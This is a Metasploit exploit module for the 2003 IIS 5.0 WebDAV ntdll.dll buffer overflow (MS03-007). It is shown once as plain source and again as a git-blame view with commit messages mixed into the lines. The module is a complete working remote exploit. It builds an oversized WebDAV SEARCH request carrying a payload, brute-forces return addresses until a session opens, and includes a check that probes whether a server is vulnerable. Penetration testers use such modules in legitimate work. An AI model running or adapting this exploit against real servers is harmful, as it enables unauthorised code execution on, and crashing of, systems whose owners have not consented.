metasploit-framework/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb

require 'msf/core'

module Msf

class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'IIS 5.0 WebDAV ntdll.dll Overflow',
			'Description'    => %q{
				This exploits a buffer overflow in NTDLL.dll on Windows 2000
				through the SEARCH WebDAV method in IIS. This particular
				module only works against Windows 2000. It should have a
				reasonable chance of success against any service pack.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => GPL_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'OSVDB', '4467'],
					[ 'MSB', 'MS03-007'],
					[ 'CVE', '2003-0109'],
					[ 'MIL', '28'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",

				},
			'Targets'        => 
				[
					[ 
						'Automatic Brute Force',
						{
							'Platform' => 'win',
						},
					],
				],
			'DisclosureDate' => 'May 30 2003',
			'DefaultTarget' => 0))
			
		register_options(
			[
				Opt::RPORT(80)
			], self.class)
	end


	def check
		connect
		
		url = 'x' * 65535
		
		xml =
			"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
			"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
		
		req =
			"SEARCH /#{url} HTTP/1.1\r\n" +
			"Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n" +
			"Content-Type: text/xml\r\n" +
			"Content-Length: #{xml.length.to_s}\r\n\r\n#{xml}"
		
		sock.put(req)
		res = sock.get_once
		disconnect
		
		if (res =~ /Server Error\(exception/)
			return Exploit::CheckCode::Vulnerable	
		end

		# Did the server stop acceping requests?
		begin
			connect
		rescue => e
			return Exploit::CheckCode::Vulnerable
		end

		disconnect
		return Exploit::CheckCode::Safe
	end

	def exploit
	
		# The targets in the most likely order they will work
		targets =
		[
			# Almost Targetted :)
			"\x4f\x4e", # =SP3
			"\x41\x42", # ~SP0  ~SP2
			"\x41\x43", # ~SP1, ~SP2

			# Generic Bruteforce
			"\x41\xc1",
			"\x41\xc3",
			"\x41\xc9",
			"\x41\xca",
			"\x41\xcb",
			"\x41\xcc",
			"\x41\xcd",
			"\x41\xce",
			"\x41\xcf",
			"\x41\xd0",
		]
	
		xml =
			"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
			"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
				
		targets.each { |ret|
			conn = connect_server
			return if not conn
			
			url = 'A' * 65516
			print_status(sprintf("Trying return address 0x%.8x...", Rex::Text.to_unicode(ret).unpack('V')[0]))

			url[ url.length - payload.encoded.length, payload.encoded.length ] = payload.encoded
			url[ 283, 2 ] = ret
			
			req =
				"SEARCH /#{url} HTTP/1.1\r\n" +
				"Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n" +
				"Content-Type: text/xml\r\n" +
				"Content-Length: #{xml.length.to_s}\r\n\r\n#{xml}"

			print_status("Sending request of #{req.length.to_s} bytes...")
		
			begin
				sock.put(req)
				handler
				disconnect
			rescue => e
				# print_status("Exception: #{e.to_s}")
			end
			
			1.upto(8) { |i|
				sleep(0.25)
				return if self.session_created?
			}
		}
	end

	# Try connecting to the server up to 20 times, with a two second gap
	# This gives the server time to recover after a failed exploit attempt
	def connect_server 
		print_status("Connecting to the IIS service...")
		1.upto(20) {|i|
			begin
				connect
			rescue => e
				print_status("Connection failed (#{i.to_s}/20)...")
				sleep(2)
				next
			end
			return sock
		}
		print_status("Giving up, IIS must have completely crashed.")
		return
	end

end
end
IIS exploits ported Added on_new_session callback and session_created? flag to exploit Fixed socket fd leak in Comm::Local git-svn-id: file:///home/svn/incoming/trunk@3135 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-27 18:42:44 +00:00			`require 'msf/core'`

			`module Msf`

			`class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote`

			`include Exploit::Remote::Tcp`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'IIS 5.0 WebDAV ntdll.dll Overflow',`
			`'Description' => %q{`
			`This exploits a buffer overflow in NTDLL.dll on Windows 2000`
			`through the SEARCH WebDAV method in IIS. This particular`
			`module only works against Windows 2000. It should have a`
			`reasonable chance of success against any service pack.`

			`},`
			`'Author' => [ 'hdm' ],`
added license to all modules git-svn-id: file:///home/svn/incoming/trunk@3377 4d416f70-5f16-0410-b530-b9f4589650da 2006-01-16 02:59:47 +00:00			`'License' => GPL_LICENSE,`
IIS exploits ported Added on_new_session callback and session_created? flag to exploit Fixed socket fd leak in Comm::Local git-svn-id: file:///home/svn/incoming/trunk@3135 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-27 18:42:44 +00:00			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`[ 'OSVDB', '4467'],`
			`[ 'MSB', 'MS03-007'],`
			`[ 'CVE', '2003-0109'],`
			`[ 'MIL', '28'],`

			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 512,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",`

			`},`
			`'Targets' =>`
			`[`
			`[`
			`'Automatic Brute Force',`
			`{`
			`'Platform' => 'win',`
			`},`
			`],`
			`],`
			`'DisclosureDate' => 'May 30 2003',`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`Opt::RPORT(80)`
Stuff.. more changes to come git-svn-id: file:///home/svn/incoming/trunk@3253 4d416f70-5f16-0410-b530-b9f4589650da 2005-12-25 22:47:38 +00:00			`], self.class)`
IIS exploits ported Added on_new_session callback and session_created? flag to exploit Fixed socket fd leak in Comm::Local git-svn-id: file:///home/svn/incoming/trunk@3135 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-27 18:42:44 +00:00			`end`


			`def check`
			`connect`

			`url = 'x' * 65535`

			`xml =`
			`"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +`
			`"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"`

			`req =`
			`"SEARCH /#{url} HTTP/1.1\r\n" +`
			`"Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n" +`
			`"Content-Type: text/xml\r\n" +`
			`"Content-Length: #{xml.length.to_s}\r\n\r\n#{xml}"`

			`sock.put(req)`
			`res = sock.get_once`
			`disconnect`

			`if (res =~ /Server Error\(exception/)`
			`return Exploit::CheckCode::Vulnerable`
			`end`

			`# Did the server stop acceping requests?`
			`begin`
			`connect`
			`rescue => e`
			`return Exploit::CheckCode::Vulnerable`
			`end`

			`disconnect`
			`return Exploit::CheckCode::Safe`
			`end`

			`def exploit`

			`# The targets in the most likely order they will work`
			`targets =`
			`[`
			`# Almost Targetted :)`
			`"\x4f\x4e", # =SP3`
			`"\x41\x42", # ~SP0 ~SP2`
			`"\x41\x43", # ~SP1, ~SP2`

			`# Generic Bruteforce`
			`"\x41\xc1",`
			`"\x41\xc3",`
			`"\x41\xc9",`
			`"\x41\xca",`
			`"\x41\xcb",`
			`"\x41\xcc",`
			`"\x41\xcd",`
			`"\x41\xce",`
			`"\x41\xcf",`
			`"\x41\xd0",`
			`]`

			`xml =`
			`"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +`
			`"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"`

			`targets.each { \|ret\|`
			`conn = connect_server`
			`return if not conn`

			`url = 'A' * 65516`
			`print_status(sprintf("Trying return address 0x%.8x...", Rex::Text.to_unicode(ret).unpack('V')[0]))`

			`url[ url.length - payload.encoded.length, payload.encoded.length ] = payload.encoded`
			`url[ 283, 2 ] = ret`

			`req =`
			`"SEARCH /#{url} HTTP/1.1\r\n" +`
			`"Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n" +`
			`"Content-Type: text/xml\r\n" +`
			`"Content-Length: #{xml.length.to_s}\r\n\r\n#{xml}"`

			`print_status("Sending request of #{req.length.to_s} bytes...")`

			`begin`
			`sock.put(req)`
			`handler`
			`disconnect`
			`rescue => e`
			`# print_status("Exception: #{e.to_s}")`
			`end`

			`1.upto(8) { \|i\|`
No more select(nil, nil, nil, X) git-svn-id: file:///home/svn/incoming/trunk@3259 4d416f70-5f16-0410-b530-b9f4589650da 2005-12-27 04:40:06 +00:00			`sleep(0.25)`
IIS exploits ported Added on_new_session callback and session_created? flag to exploit Fixed socket fd leak in Comm::Local git-svn-id: file:///home/svn/incoming/trunk@3135 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-27 18:42:44 +00:00			`return if self.session_created?`
			`}`
			`}`
			`end`

			`# Try connecting to the server up to 20 times, with a two second gap`
			`# This gives the server time to recover after a failed exploit attempt`
			`def connect_server`
			`print_status("Connecting to the IIS service...")`
			`1.upto(20) {\|i\|`
			`begin`
			`connect`
			`rescue => e`
			`print_status("Connection failed (#{i.to_s}/20)...")`
No more select(nil, nil, nil, X) git-svn-id: file:///home/svn/incoming/trunk@3259 4d416f70-5f16-0410-b530-b9f4589650da 2005-12-27 04:40:06 +00:00			`sleep(2)`
IIS exploits ported Added on_new_session callback and session_created? flag to exploit Fixed socket fd leak in Comm::Local git-svn-id: file:///home/svn/incoming/trunk@3135 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-27 18:42:44 +00:00			`next`
			`end`
			`return sock`
			`}`
			`print_status("Giving up, IIS must have completely crashed.")`
			`return`
			`end`

			`end`
			`end`